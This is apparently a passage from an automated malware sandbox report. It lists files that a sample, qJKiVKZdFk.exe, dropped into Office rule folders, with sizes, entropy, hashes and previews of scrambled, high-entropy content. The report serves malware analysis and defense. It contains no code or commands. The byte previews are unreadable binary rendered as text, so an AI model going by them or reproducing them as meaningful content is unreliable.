                                                                                                                                      Preview:<?xml.j^.g..z....e?...h.O.....m..'..'+.....d...Ho.. G.lvU.Uv&."u.&'4....4.G..j.>l.".....5.K.>b..b...s'.R..\'2W...._".!.;.....(.Y&.o.A5 ...kgh.'2!....9..ahP......:..j....9E...F....T..!...EF..e...$$.qy4..M..V..Q..*.....r.o:....&/...`x.7......:%.3Qdh .*Kw.c..!..L..O...Q~V0..3t.._....E.J..(......|.h.j4...PJ.4....G..Z.....i$..w.Ot.0>..y..I.a........mERv..`9K.4..\..;_M...8tr-....V.vt/.3.X...M>....7..v.S.)Y.Z...m....U[...w.....A.M.]uyG....wt...?...y.H..c........dy...R....u.C.r...P....C...#.h...s.p?..D..._.@..K.....).v.^R.....dQ...<&i.y`tDG.2:.....!K=...h.6P3Px!...79...}1......~..uo...3v..w...lw.H.4U..3..........m)...R.*2%.W.._.....(.+(^>....=A.."!.........=.f&.....I.t..iB........./y@...u.u.........Wx}............m.#...y(......o{..{.`V..{T.OJ..k....mP./F../=...../.....D.s+...Q......u....&.....!...Pd..6.J;.rn.....G/B..8i.aT..}.@...EH.....`.D+..9F.#/...k2..5..x&&tn.0...q...+.....`.S._.23......._...4..(`~On.frt.....).z..H.....R......Z.j.?.p..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701400v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.8688632990513385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:nGWe0KbMPCxeLvJ0KI+sqVpN1Mvm5PcklAh1FGID:nGCtPCxeLvjI+/KjNPgU
                                                                                                                                      MD5:846591BA9D2955BB2F64A3AB67E7FA29
                                                                                                                                      SHA1:2B1539C0EA29893CEE191D6298513A81F1E40856
                                                                                                                                      SHA-256:214185D970FBC7EB216DE78F82F8AECB5BFD730D4582C2D9B098DBED29FFFD0E
                                                                                                                                      SHA-512:11F5AC54A3B1DE48A6495FF3A7BAD335D6D829D43E461961F05F8F590485DF51290702801DE0BE3A2FEC43781910AD9E7C69739D37FA05C0A1D397EF85B8E724
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmln.6=P?U.4.O...i..".O...E3..u..."}...t....._.n>'C.....y...Y......MFh..b....V..:..+..4......G..[.WV..[&z..H...E....?_.=K...`y..%..|u..q......[.Mq.G.d..Hc.Smf0...r..>.m.3&.V@Hk.2.X...|...N..|....n..:.K.R'.....j..(...j..;jO...%..0.O..R?]2.).H..8...8(.z..2.f.m...I.o.......k...@P6.9..!.SI.`...L..+Y.|_cR7g.h.".\./....{.:.&".../d..(.h....A.J..v7=K.Qr..c~...).g.f.f...#....}......#..V0!rF..Trm.Q.r..]c......T......Ew.n9.W.t.;.34.6<.B@....y\@....K.k"v91EX.5...c.Hc..6.qt.........Kc...}$..b..j....@.../u../8.j.^x}.+...o....+.I.O..y..9..2..xk.`>.}r.f.9.s...<.9.f.{.GD<..,.F.X..hf@.s..H...%........QB5.#....dx...chj[.vP-...........S...?.J..[[.wH..+E6.u.M.U1......%..KO...:......b...dR8i..;.]p..3^)..G:.>..yl=..|....@. ...Yp..-.xCu.9.....dI..|.<..&N..".{.d....._.f.c.V_Y:.`...~...7..}@.8.m..{.....b..2....9.......a7.E...Y.=v....k.-3.....[._?D8........v3M..^._R_o...u.Y............U.&.wT.E....Q.68ODd.].b....~8Metc...};HxS8&..#...x.w...[.+a$..S..Q......q

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701401v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.884887518495419
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:oT3CTyr3NZTo0nuRyT46CK++D47clx+9RrBUkX8ws5uaMs2vQmxvbCwcDv5lZLzF:6ZZnu0GK/8wyRrSonfYmN2w8LZ07t8D
                                                                                                                                      MD5:DE4ECF290B3878604C8B4711C65F8849
                                                                                                                                      SHA1:55234AA83AD013BC9AD6E78C78C8B3BE384E6AE1
                                                                                                                                      SHA-256:069EB873C53A306F10D726EB19220FEF3B6EDDCC6556E65188CF941087F29038
                                                                                                                                      SHA-512:60A9EBA3685D97EB71DC1B6DF4DE254EF352F59AC1D665BA5A9D81B38A4B2CFD11AB5C14EB73B22DFA880C55DF8E66FD13E1BA2B009B82B43671176B715A0D5A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlU6...G_......._)O.q.Z.u.#./'...y..+uMxR..7dD7...M.f.._.w....4/..i:..h.9..c.M.s..iN........|o.J..,`.D]7..m.....9....4..K.}*.GZBut.1...:P.t..P)*(..%c....S.<uC......ob.e.)..^....e....4#|M.....CF2.........f.A."....U........ABF|=5+...<;v....<Cf..Q.GJ......s...w..T$..*..#.d.dF.....o.U..o.S.u....NV.|k.m]s.`......9E...2...`..X.+g>..(..uW..Q.M.y..uT.+g.r3....[.u.....{C[.}...qf..\.}.1.6..e...an;....Z2w_.\),cM.T..;......S..^.._...Pr..:.G@|.c}0.....C....2.*.m..`.........V|..,......$qDk6.J*.....,Xn.C..(..!...B.k....."...9.F..Z*2..\..!u..R...|...sZ..M.T!...A.dpo......$s.].G-..eeq.f..s..:..:...Y_lI...G../..5.!..t.r ..3....x.E.......O.......y.|,....(..5&..#..]......3......f...Q......j........>U.!....L....1...=a,R..>R"Z.3...U..=.@....}....(..U..&/..c.K..>.P.b....4..ZG.+...0q,.R..^...;..J(ph..q.)f.%.b...\}.%..Q...*.E8s.m.......'.~".h....-"..B.L.......y...D.Lh..~]...b(...wd......>.....n*.R.....Q....~...#...f[...5q.].,.L.....i..j..y!..p0

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701500v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.89254134724214
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YB4hP2y3iWFrEb8DEOCp12T5cIcmgq2vWxz9HRzm4aZq/1IeuMi3QAqHgUTywUXS:soPdSWF68mr2tTcpXWxfWeuhQoTlUFD
                                                                                                                                      MD5:E4B95720D36D21E21B92008ABA757EC7
                                                                                                                                      SHA1:6274E785BE80C508B0ED92CE64D87AEFD28C6904
                                                                                                                                      SHA-256:D573C6EEF41B66032464F34C1E53A47E2153847967C87327DCD84C1F33815F1D
                                                                                                                                      SHA-512:451485269E4C04BB447B50D2313005D36A3DCBD607162B642BC3908C3182154DE2694D11417434574393C7EFFF186AF76870DB6A7B340B1153C30E8F40828609
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlt.m.4.....'.....9`Np..z=a...>S]..o.E..ci.# 00..,.!.AS.A.U..?\.|..)..:.A$...9..y.. .x.._.H.>^.....O...$(...o..T"6&.o...._..2....a.,I..1....w3...!.LS...8G.hs...Z..u.jp:.g.p.......".g...z.......@..*.4..v.*0_eT<......4...1.:.........._..V)....+c.J.O0w]..W..q\4...O......&...8WW.&4..../.......p.w&9.5V.DCq..G..N.....]..b'.5+@..q...O...wq...\%(w.r*...(.R.)i.d.....xr....x...._.P.K._..o.......q.a^u...>...e.O4....L=..m'*....C..}...L.~h#$.u...Ns.X..:..........Fkqm......*.vP.x.J...r EL..@.8.....KJ>.c`Y.....Y.....A...I2..'.....n]J.o..)v...lP&.lC.[e.L..7.....7...[.x|..Oy..{.0....$/<.$Vz.......B.....k.Xs...3....T=.q.KVB..j.Y./..v.a3vl.2..KD...m......=*..r...V... .j..X..:..f.M../L'e..v.v.....MV...S...(......z.......<S.gU..u...a...{..........? )..."......V.....*^.d`FG..+!...^t...eSO..;...1l......Z.j._"Uq...P...`<.5...6I.}..uNG..`| ...7.5....1..7...1.l.?.C.!.`........3.....".+.mR..{#X...,...%&......|...f.9.Z.......7Wo..v...X.tU....U..&fH..o.m.@.7.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701501v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.882947793103163
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:45XrktE0kjzJ0NbnN0eFCOt/zJuD149WNYEcD:0XgEVGbN9FdJa1NYEY
                                                                                                                                      MD5:D9E32AAEA20DD9718838AA8D4C02DAB3
                                                                                                                                      SHA1:EC8DDCFE16646D13B891DEB1BEFB8F0BEF683455
                                                                                                                                      SHA-256:AD40214B1C43FB2410BD71D0B7DA4A3F48F29DCE27112D9FD3C622CE74FC7437
                                                                                                                                      SHA-512:E22A7E51B83DECA93A05AF2665D51A2027736648B5606EC7C2E7218AC1295D81BED566FCB0D349E76EE852415FB3398E7E28D6A4D39B76331387DD548472F3FB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml0!7;:.....t.....9.k..PXS.I.{.Oo.y....=X...,V5[.q|...x...m.z.a=<.[3|..Rt....A..cu.......w..i.r.....%...d{!....xL..?.wSf........9..1....=.^.:......q.......e...$M..(9....V...r...........Y...C..!..V.l.c..wHtT...V..[<8..x..F.(..u.fK...XY.kU_.-w.$.o<V..s#....5./...M.0^bC..K.n.x..%.s..M...D:au..#.........:%........."....\...l.(yB..tY.....+..x....3....T.k.y.;;....y(.v.\!..j.C.S...o...f`]..u..s.F.D..>u..|...O.D."..G.h.....,.-.l..d...^q....5..L.i.../......4..w.*.C.u/......W[..@..%.^.9.Pj=*UiCW....^*A}.m._#....h.SS7~..X.!A.j.K.....+..#.!0..P\d....s...3....H.q.d...~W......>..'.......W.. .d...i.X.<.^y.2.|.....b9..C..n....M.....P..1..._8..!D...mb.@O#...A....V..."w.>V+A:.y;.O.1'.$..1.l..*-.z..7.1.[I%.....,..n..:..r..{......J.|.+....0'v..c.~Q......6...P..A..[-..."].xxR._#5...=Bt..D...uI.......L...3...yp.....;"..V0..x^S...Bp..\(..+.....E..h*...c.L.7/..<._.K..y@..[9..('.....C. ?.+.o.`*.......z.H...\%..9...cbsZ%U.T.I.U&V.3L......R..z..(=...,69*.fXg....J.X.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701550v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1701
                                                                                                                                      Entropy (8bit):7.877385322944105
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ToriWznjA4dRZoDwcjcEIeeP8lvxqAUM+xsejQ6KD:cj4iqUcjc1ilvwIVEi
                                                                                                                                      MD5:CF5D765B5DD8A433E7CC3C66913D3A88
                                                                                                                                      SHA1:4D84956FF5A3F68CAD5F44B21BAF23F5656F205C
                                                                                                                                      SHA-256:6EF01A585CFBE1E24D70670B5D5AFC28BB05B86A76706E347489E333ADFA5518
                                                                                                                                      SHA-512:E68107052D1E1700798E4BED7A5BE98459947CE6679503E8DC5358EFAB44D1C72365E820828794337637DBABBD551DA52BA2A1A5F7D5CA1CBB90A8EE6FF505A3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml*..!........!...f....>.q...T...Xm....}=....v.S..07...%Q.B9.....hL.u).h-.._~..;"..5.......R...C.1...j.#X.....>...1.p .9......yU..icG........z`...AA...!u....X..X.{r..a....]K....4..<D....+.MC..$.PIXT.].4......s.+.S1...%...Cp....i...ix}....Yw!Dg..E.A..^........Hq|K|.. z.]6..%.}s6.IF.:......(.6.iT..][.e..h.......u...Y.F,..IH...#.M..X.)..,...c.......,l..rg.6.U.bWvb.$..+........fK.3...el....V&.$...I.....z.Qr...j...T?.a..sC]...Vo...0..4..J......:..... .p9.0v..^......^..4I....4.oA-5!1N...1.2/y.x.q...H.;u=.......?......j...y6=...4.....\."eU.y6.n...Idi...mC.;"|7_k..0Id.S.p_]..!).W.......IM.......i5>..3DT*.K.B.@.cr.R.......b.&.^..........![%]..k.S...!:B...,.)..S.l..3....&.Vl....~=._..8e0..0.$.gX...-.[.>.;..od.....5..P`.K7.B.+...Y.LB=..."..5NOD....&...O....a........#..X...U.INJz.=..I..}.O./...j..}..........h.8C.?U,.n(..8.........X...T........E/3.T.p.2.....a.gi...].^...:.~kw=...u....&.a?Ce[....,.M.`Mb....CR..}..........a+.H?y,..?.....K.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701551v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.871702530343186
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:WHeOZCA02EfVt/wEyqVJVP6ORWuRL3hSSvc6BmC8LD:W+OZCcEtKYLP6+RvRBt+
                                                                                                                                      MD5:4E7D3F849D2BC274D6ED462333C11B5C
                                                                                                                                      SHA1:B605F1F34EE1FE48673A50BB097FCB0ABA414810
                                                                                                                                      SHA-256:B19F953AC55CA6E7DD8B6152061A9A08C867AA92DE9ABE4F70E854BA460B470D
                                                                                                                                      SHA-512:8ADE7F23A9724D146F5886AB5DC37800B6A481F7F14314A593359F2805A99742E4D947D5A24571FB4121BB834B6A2CEB50D209FB51E472C9AA09E6A355420E73
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..r...8...O.W.m...-..........BO..q....(}Z7.T...z.z.......km<[..uwK.!.U[J.bU..Y.#.D_z..p.SM....k hd...x.a.u.....Q..1...j.m ..F.[2..T.d}......N...q..._..o.:A."Q.\.....R..+b.B*q....w.3.....i...x......E.[j..0.|...er@u..&t.lh...z.Q..".O:....'.z.n.1..jkv....%.#.3..D~\...4.hz.;....:.t.]T.v.zun.2..........T....2...d..W'}....._.....@"."...\.:.6_.!.s^VY.pzt.E....Z..3.v.(A..z.\..V..8L.G..&%..R........B..kk{4..?#.=.3,.j......N...lD...@!rE..^s.Pn.h%,9r.._.K..q.....q.a.."u....' ../a..........l..$Q~.f..0.|.9z..\8..5....Y..jN..T.W..%9.n.}.l.X....X.u.b.=?Sr...c/..sE".....!..ir........!.c.)rO...o.....a.yp._=.F....../U.(q...9E..d.x.3..V]..>.\......JE..3.;.-.....0$.u '5......@|.6N..e*<..1..`w.K...nc......B.eM....k.u....#J.H...^.u..K.w..sTK..t&C..i..u7.aN'0Q..&O{...kE.Ja..b%?.X.YCQ.B|.b .vL3b..jU|.;5F..C...q.L..5]..wMM..<...........L..#F.......+...h...|.Iz.l...S3.j..g..]&.?...Q..)?(./.D..!./<...C ......J. w..oR.*..\....X.u!..TK.([z6#d..ZH..y...K

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701650v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1705
                                                                                                                                      Entropy (8bit):7.882150750242345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:w81E3WPoZ8mT//ZdXF1j11jxqlEenfcS1+8RUjf/D:wqG/v1FvxiU0Rs
                                                                                                                                      MD5:BF3C02D2FEA02939200102AABB9A3A73
                                                                                                                                      SHA1:EF24F7747600A4B1E0CE82757D9B64B7A26098E4
                                                                                                                                      SHA-256:EFE9AF5D89AA5E1B3ADB626AF51E3BF6570C30C6605C164AD6984AE324E2F361
                                                                                                                                      SHA-512:DF032EA9DC8248D9F69C360335FE8C79C7416B8D92BDF5B10909D925F3170391D4B6198C8C73FA71AA164EC1F19FBE1E40B1C14B0757DE79255BA3420635E789
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...%....(......`6".F./.V...)B..C......+......0...6.O...s...f$^Wv2{.!w....t....a...Z......+....:...a..t.....J..L.....C 8.F#.y.!S.E.....(.....H....1.XJJ..[<]>^`.s.. .....%..%....x......g.Z...x.N..L.J..G.(..#..I...6.gy.;(q7G.T,@o.9...j|.....h.W.v.g.ZY.{..@ZJ...(2.].R.{...A..;.$.....&?$Z....).Ig.x.!..._.0.8v..(.....Z..]..]B..9.o....($..:!`P.g..U)...9.bw@..: .......u...D.gF[...aK.I@.....'.tZq...x+.*v....i..j.}=....h0,........-...^..L...7#k.xp:=A...`.......tPW.!....*...k.>.WO...`TqI#.x.2..2.P.,.es.6..].X..4a.A..S.<..!...^..a.f.,..6.l.gU.j.(1N..ND...b........P..9...?L..e9`Q.q..{....bf..*..u.[3<....BE.[S...@|f.LYp..w..y.3^y.w8\s...v.=...].V....2.. ...?.-........W. ....]5h.1..O\.......<.....O.B3'U....q".'L0..fb].w.|`..T...Ni.m~.aO.8..lZ...>^.f..N.EI8OmK.G.6.f.J.RV..U......|.m....`...].l...E.U.'... .B+...~.q(..(.K.!....d......Vy...z...........lhU...%U......~..~...K..}...iY...;0...7[....j(...w./*>..JWCC.$..T....e..._F..Z......j..z..L

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701651v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1742
                                                                                                                                      Entropy (8bit):7.878946223276303
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:/tAaC+LI3oRk0I41qyZE7jON7lzPmRjL193/D:FlVI3ik41Z847lDq193r
                                                                                                                                      MD5:9013E0E8E715341F03C4756037C95C23
                                                                                                                                      SHA1:3BA50339A6823CB02E87A2005DDC6AC069D97666
                                                                                                                                      SHA-256:9EC27770F53180A0139ED8805F53B5F3B91E3CE143A7568D627004F8C7585F91
                                                                                                                                      SHA-512:7A1CBE16B42D72E35F4DE088CF9E2C8A11A7B787A319FFCEB36B9913EB9378B1A8DD374BA173C522185FD5A89AB1D5AAB29C41C630847B5F0F576A1E8969DC2C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml;.Y`.z...1._.r.-..S.CU.....=F9..{.+w..}.q".>.s..f2>U......5p..........v...........F...O.^..^J5.F .l...o..K7.........L.......l.....9.".C4:C........!.$P.u..U.....#..f.'k}._...3E..$..B.#.k....9..f..N......-.G..Z..;....Ii...n.-z"kYa......D.y...........{.L,|.....b.x.~.....D].w..#.?3...z..%...[:5....;.t......e....#..[......%...........8........\...>.^. K.v..2..L......N...3.........4...wa8C.V.L...A......Y%i....T.V..!.w:\.,.............`.[.xKG......%.4.ed....(..j......=..>.s.AI...=....g.&..BVZ.f[.%ll...l7..:P.l..+ ..+....Y._#OL.d,...^.....u?..t.7-Q..+QS\Cv^....Q......1j.W^N....ySB._z2.Z)md1.......\...._.x.1.{ ...o....k..b..P.&a.*.|...d...=...d.y...T..J{A.#H..E..H...QA...a......Kl....?.....(.x..g...#.......a.GE..... .~%...8......;.......b...=..e.|...c..C.'.a#_...t..u`OU ...+w..=.HS#......4R5k..{..6.l3C"+/_.(...Z..O.IS...&...7..z..S.q...]F3..-.A.M.....se=.(..({.....S1......6.n..]..la..X..pC=.N...L.=....r.'I.D..Q.2H.p....$.;.........b.Cp.1..e

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701700v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1719
                                                                                                                                      Entropy (8bit):7.884171823318748
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:D5IrCGtESKup+88hZ7GrQMrNBri6egOPID:DSEmpxBje4
                                                                                                                                      MD5:628131D6A468F3891E5C38331FD6D672
                                                                                                                                      SHA1:DA2E52DC0D0506D61E20CFDF9D35B231A2FEA96E
                                                                                                                                      SHA-256:7D2C3361657210DBDE3C53C42B6D05F4447BBC357493FAA2E8C94AA6A7D6E743
                                                                                                                                      SHA-512:E0FFA621E1D004DAD71F6E6A961782D54DE6FC2827915E34D8723DA811F9D6358DD2F224FC26725B24FAB89DD84343453F5965FF60F8A1B2971D671175A736C8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....l........n....G]^..=vp....^.'..8...$.x(..1..j......3.)W....|.r..Z.W7.Y.. @."F.x...]6...fS., [..R.Yv.$.qg....mV...c;%..O'..c...a....MfE.S;......:.*......*.....M.j....e.....p..{....&.B#.+.{.....dF5Av..e\.......T....O9<...Z2 f........,y.C..|..W...~..}..[~.......kO..G41Y3.p.....R....p=..T....GqP.u.?.m6..K........a.4.C#..~....Pma....8I/..I.F|.p.+d],...$@..~..._.X.e.&...+.&r...D.Ll.....L.Y.N./.S..h.,.^z.r. ..i..2{+/..~;=}.....A..t^H.[e7.].....j..t....i.B&&a...p...d.Z{P.....u..j..v...at....pA....x... ..*..!4.~.a.0&.....2... .#2o.%..#..."...u..~)up|Z.{.V.\.<.....!.j.Oy....v..D.R...I.7...P-D.t.LA...;..6..;...v.!.q.K..D.H..).v...!O....:C...'&p6*i{:...l...)..$.-..q .j|.J.....T..t.e..do...`;`..A)....4.....8.H.O...;...h&.~.B.......k.......A.'.+4......7.hF.Xc(/.n....C.Ka.'.....8.P..\.E'....D..j..L.).x.U.......@ .[..@`{...b.ZX+*..^.HY.....@.....:=..A/.j..7tW....!....-.......).u.._.m..x.H.t..K............z..... ...%2.#..].r..x.....b9.<.1....Q.D..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701701v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1756
                                                                                                                                      Entropy (8bit):7.884813704666487
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PYuHjcYCYvxafO57rRcqH5pnfn9UzXbELN0EJD:PY6XCYvrdrdH5df9UTEuEh
                                                                                                                                      MD5:EC4F825F1801444DFC9A48710530C8A7
                                                                                                                                      SHA1:B58D53002330BF6474AA014CCEDBAB8F68221695
                                                                                                                                      SHA-256:2CF6C7BC02F2B1B990DE56FF6CEED3C16E2F8B456449B357519B7AC969D45513
                                                                                                                                      SHA-512:48EAF0DFA0B78E7C9917077E8F1D8C8DB23D838882B90B1281D8A078BAF1805A1D33B8C538D2847E55D0C5ED0377DA2130FF18691B6357717987DF280C8B707C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.6...X..2....y.a.|.b..{p.....*.....\o.Z!5.3.D.a6.<F....K...R.O..%....N...D./N..]9h3.&.J.&.........{Bv.........E).:.U.=.h=.C..r..E..y-.......f..x<.K.[..#..N.M.O..f.!._p..ErHD.E^iS[.<.....k^. 2c8}.q+U.XM#?2..... aP...+......B+.S...G.+c2.@.&}.g...8......S...4.....T..x.2..=..I..vO......z.@.v..;L.v5..t.....:.O .....B...9!... ..^....x.&.{.....o%.Il2.=\..,.H..q.S...2....Nm.Yz...C......1...>;..b..:.y.F...~-p.8...\.p.4.../.n.........BJ.6*..../...^....r_H........v....Z.....N.o^P..16...D..W......EKnhW.......4oV...<M;E@....r.}X..7t........k._..QX....#.o..(..8'7....J...y...X\.......b......3.q!Q...$....$....U\D...;X..-%.=.]...r....pV]..=K..b....\.......g..J..q.l..Z..!.W....8vzD&Z.....C.4....n..$... ..../...].[.U.r.u.......;H*.q\.....O:i..C.\2...p.T.:...x.d.....6!....._..A...6..$n...5.4..._N.w.l. 6{&..[..&..*.1.B.W._.+)St....w.r.....U.....sY[%l.l"57 .;.a...I.6..!.....[.&.G....>....k.6....K.d..t..4..|...Q.FiE..e?...{n.2..0....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701750v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.893881386454844
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:3cb3Q4sPIiv0aqcUknkL97QvDa5GNJ2TabOJ4PD:CZ6lDqcn4978Da5oJkabOo
                                                                                                                                      MD5:02F9C05504620D055A28F3BE0CDD845B
                                                                                                                                      SHA1:CF19CFD54E00216769A44F103E625659B678BA9A
                                                                                                                                      SHA-256:8282914856861ADC192E2A196D34EB6BCC27451A204E9D50138F46C7B10A1BAF
                                                                                                                                      SHA-512:35762A6413C20146CB419DD8A91CE4ADAE81320413339555EDF3BB5744C3B2A894562897E14F11E8D4213D527B5077122CE25D41955D737B758FEAC956F8B77C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.......n..R.}^...?u.a.E.._."..........P.:W8..2....2..i.5M.?+.....~5W.AK...'1.=....x.....Q[......n..$.0....:......b...y[.r.W..6.kt[z.82.=...7....U...2{.]..%.JM..fm....$........?*/...uN.aw...NX\.]...p3q.|$.h.....}.Mb.......$;\".......vN..E.._.V....Nt4....J..}?....JG.....C..z:a.~.......<.....M..G....4.=h......6b.dj.W1.{y.$8.....{.......H`...t@:.E4...U..:.S.1.'.$f..&.\...P.....h7.|YIC@.k.fRV....A.U...q...V.Q...0..Z....*L:.....s)Im@@m.OQ$(L.M..Eel...G'..wW.....<..o .......T.x..[b#.~..R.`.V..ir....%.#&.\.?I.P.........).....lmWKB....u....a....O...i.dm..y..G[.d!J...}.[{.........\hL......<ZLv..2...<.X6..%.&......N......D..IA...kt9.c..U.%\..*}Y%..Q`.gS.....1........g.*...9...U9...)T0..:Yww.x.....5;[.\uB..w...K.n...d#.iml.;$....fBw..+....Y.&?.....$..8....DX..#2/QW..;...D... .d....<x..1.v.'<P.j.o{.m@.;....h.a/0.P.n6o..V_.-.....0.@.R.;A.....L.d....R.1-......VGZ.5Y..%PZ.v..g.n.!<H.....e..h.].{[. .B...6"6.#^.ARL.6.(n...n.......D..)..|r.&.N..w.T.+.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701751v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.890301560709509
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:stqBNhJTk83Dvahny77qc0kU2YmYNXFtNANN4NsoaBGQtX2Hw1xyNp34WC91iVmo:VNhJR7t7LHYWNeNs0Qh2QHyNp3XtBD
                                                                                                                                      MD5:06B4E2D91AF0FC3515E60521A3628662
                                                                                                                                      SHA1:08F02FE5FCB08BDC161FE39E3EB4DF5821C8D524
                                                                                                                                      SHA-256:E7CDC3E50E02A5D47AE4842F75CFDD48336A93B1FD6DE0A0C70DCEEC47C21E84
                                                                                                                                      SHA-512:39958E27ACB9B425B6B4CC3903CE54788BDE9E5D47E7F4BE38AD0F8DE2FF29F6DAA7386712EC564B76140085E9D91926BD4A252DF88857B08F04B26DE0F45226
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..n..."........SF...d.Z%......D(........t..m...8.P...$........2"b&K.Wa.J.bx...|@V_4lRc..........(...t...Y+....q...oz..>.X.EQ:Fn./.'...h.Z..5G.......>bV.,.~2i4.T...R....B......).aN.lRh.......S6&R..i]j.....)....EK|0...N....8....D...yX..l..n.<...QBt..Dh.$".(.p....T....%W.k...T..p`..Bq........D....N......Z...9.(..........0z~.U~..e.@.....U.bi.......D....&.!...b....q..S8d.....2/.Y.s..}{.'.eU.#.....n.Es%..N.,.dh..YBv..?..H}"N....V...ZP......U...H..@[..@.e..l..;.."...=@.|..n..3.a.T..........P.0..,t_:....t.....*...=..v........Lq.....?..$.'.0. ....n......M8....IE..s^....X..u....``j. ..V..i...7..1... .....v....M..F.Zt......x..Q..g........-G-.=.S.U.!w...}..;a:.p"...u.8..p.>y.....x.Z.p&6*.a......(.....O...\.?......Z......f|.,...5aa$$.7g>.^.=..;.b.-....'.J.X...J<..e.n.............O....H.`:J..CSD....f..`<.V....X....Y.....N...#D......#x_.a..!........Mo.W..C.J!.JFqY{..Y.h%..).t.#.B=K.PE$A.....H.g...I.n..e...&vu.Q.P=.....qL.nL...zyS.Wq......;".

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701800v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1699
                                                                                                                                      Entropy (8bit):7.892951036911762
